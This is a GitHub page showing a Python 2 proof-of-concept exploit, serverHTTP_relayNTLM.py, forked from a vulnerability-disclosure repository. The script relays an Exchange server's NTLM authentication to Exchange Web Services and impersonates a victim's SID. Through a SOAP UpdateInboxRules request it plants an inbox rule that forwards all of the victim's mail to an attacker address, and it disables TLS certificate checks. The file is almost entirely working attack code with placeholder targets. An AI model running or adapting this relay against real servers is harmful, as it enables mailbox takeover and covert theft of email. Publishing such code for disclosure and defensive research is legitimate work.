forked from thezdi/PoC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathserverHTTP_relayNTLM.py
180 lines (153 loc) · 5.64 KB
/
serverHTTP_relayNTLM.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/python
import socket
import sys
import struct
import base64
import httplib
import ssl
import binascii
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
#Port for the HTTP server
#Should be the same as in EVIL_HTTPSERVER_URL in Exch_EWS_pushSubscribe.py
HTTPPORT = 8080
#You have to replace next values by valid ip/address, port and protocol ('http' or 'https') to EWS
target_ip='exch2016.contoso.local'
target_port = 443
PROTO='https'
#PROTO='http'
#Path to EWS
URL = "/EWS/Exchange.asmx"
#SMTP addresses of attacker mailbox (we will receive all emails sent to victim)
ATTACKER = "attacker@contoso.local"
VICTIM_SID = "S-1-5-21-4187549019-2363330540-1546371449-2604"
#Debug flag:
print_debug_info = 1
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
#EWS request that will add inbound rule in victims mailbox
body = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
<m:SerializedSecurityContext>
<m:UserSid>'''+VICTIM_SID+'''</m:UserSid>
<m:GroupSids>
<m:GroupIdentifier>
<t:SecurityIdentifier>'''+VICTIM_SID+'''</t:SecurityIdentifier>
</m:GroupIdentifier>
</m:GroupSids>
<RestrictedGroupSids>
<RestrictedGroupIdentifier> </RestrictedGroupIdentifier>
</RestrictedGroupSids>
</m:SerializedSecurityContext>
</soap:Header>
<soap:Body>
<m:UpdateInboxRules>
<m:RemoveOutlookRuleBlob>true</m:RemoveOutlookRuleBlob>
<m:Operations>
<t:CreateRuleOperation>
<t:Rule>
<t:DisplayName>SomeRule</t:DisplayName>
<t:Priority>1</t:Priority>
<t:IsEnabled>true</t:IsEnabled>
<t:Conditions />
<t:Exceptions />
<t:Actions>
<t:ForwardToRecipients>
<t:Address>
<t:EmailAddress>'''+ATTACKER+'''</t:EmailAddress>
</t:Address>
</t:ForwardToRecipients>
</t:Actions>
</t:Rule>
</t:CreateRuleOperation>
</m:Operations>
</m:UpdateInboxRules>
</soap:Body>
</soap:Envelope>
'''
#This function takes NTLMSSP_NEGOTIATE and sends value to EWS
#When EWS responds with NTLMSSP_CHALLENGE it will be returned as result of this function
def get_ntlm_challenge(ntlm_negotiate):
headers = { "Authorization": ntlm_negotiate, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml","User-Agent": "ExchangeServicesClient/0.0.0.0","Translate": "F"}
conn.request("POST", URL, body, headers)
response = conn.getresponse()
resp_data = response.read()
if print_debug_info:
print "[DEBUG]: Received EWS response(get_ntlm_challenge):"
print response.status, response.reason, '\n',response.msg, '\n', resp_data
if response.status == 401:
Nonce = response.getheader("WWW-Authenticate")
return Nonce
#This function takes NTLMSSP_AUTH and sends it to EWS
#As a result we will be authenticated by EWS as "Exchenge server"
def use_ntlm_auth(ntlm_auth):
headers = {"Authorization": ntlm_auth, "Content-type": "text/xml; charset=utf-8", "Accept": "text/xml","User-Agent": "ExchangeServicesClient/0.0.0.0","Translate": "F"}
conn.request("POST", URL, body, headers)
response = conn.getresponse()
resp_data = response.read()
if print_debug_info:
print "[DEBUG]: Received EWS response(use_ntlm_auth):"
print response.status, response.reason, '\n',response.msg, '\n', resp_data
#Connection to EWS
if PROTO=='https':
conn = httplib.HTTPSConnection(target_ip,target_port)
else:
conn = httplib.HTTPConnection(target_ip,target_port)
#we will use this to stop our HTTP server after the attack
step=1
class postHandler(BaseHTTPRequestHandler):
#Handler for the POST requests
def do_POST(self):
global step
headers = self.headers
print headers
authHeader = headers.getheader('Authorization')
if not authHeader:
self.send_response(401)
self.send_header('WWW-Authenticate:','NTLM')
self.end_headers()
step=1
else:
if step==1:
ntlm_negotiate = authHeader
step=2;
if print_debug_info:
print "\n[DEBUG]: NTLM NEGOTIATE string:"
print ntlm_negotiate
#Sending EWS request with NTLM NEGOTIATE and getting NTLM CHALLENGE
ntlm_challenge = get_ntlm_challenge(ntlm_negotiate)
self.send_response(401)
self.send_header('WWW-Authenticate:',ntlm_challenge)
self.end_headers()
else:
self.send_response(401)
self.end_headers()
ntlm_auth = authHeader
if print_debug_info:
print "\n[DEBUG]: NTLM Auth string:"
print ntlm_auth
#Sending EWS requets with NTLM AUTH
use_ntlm_auth(ntlm_auth)
#Let's stop this script
step=3
return
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', HTTPPORT), postHandler)
print 'Started httpserver on port ' , HTTPPORT
while not(step==3):
server.handle_request()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()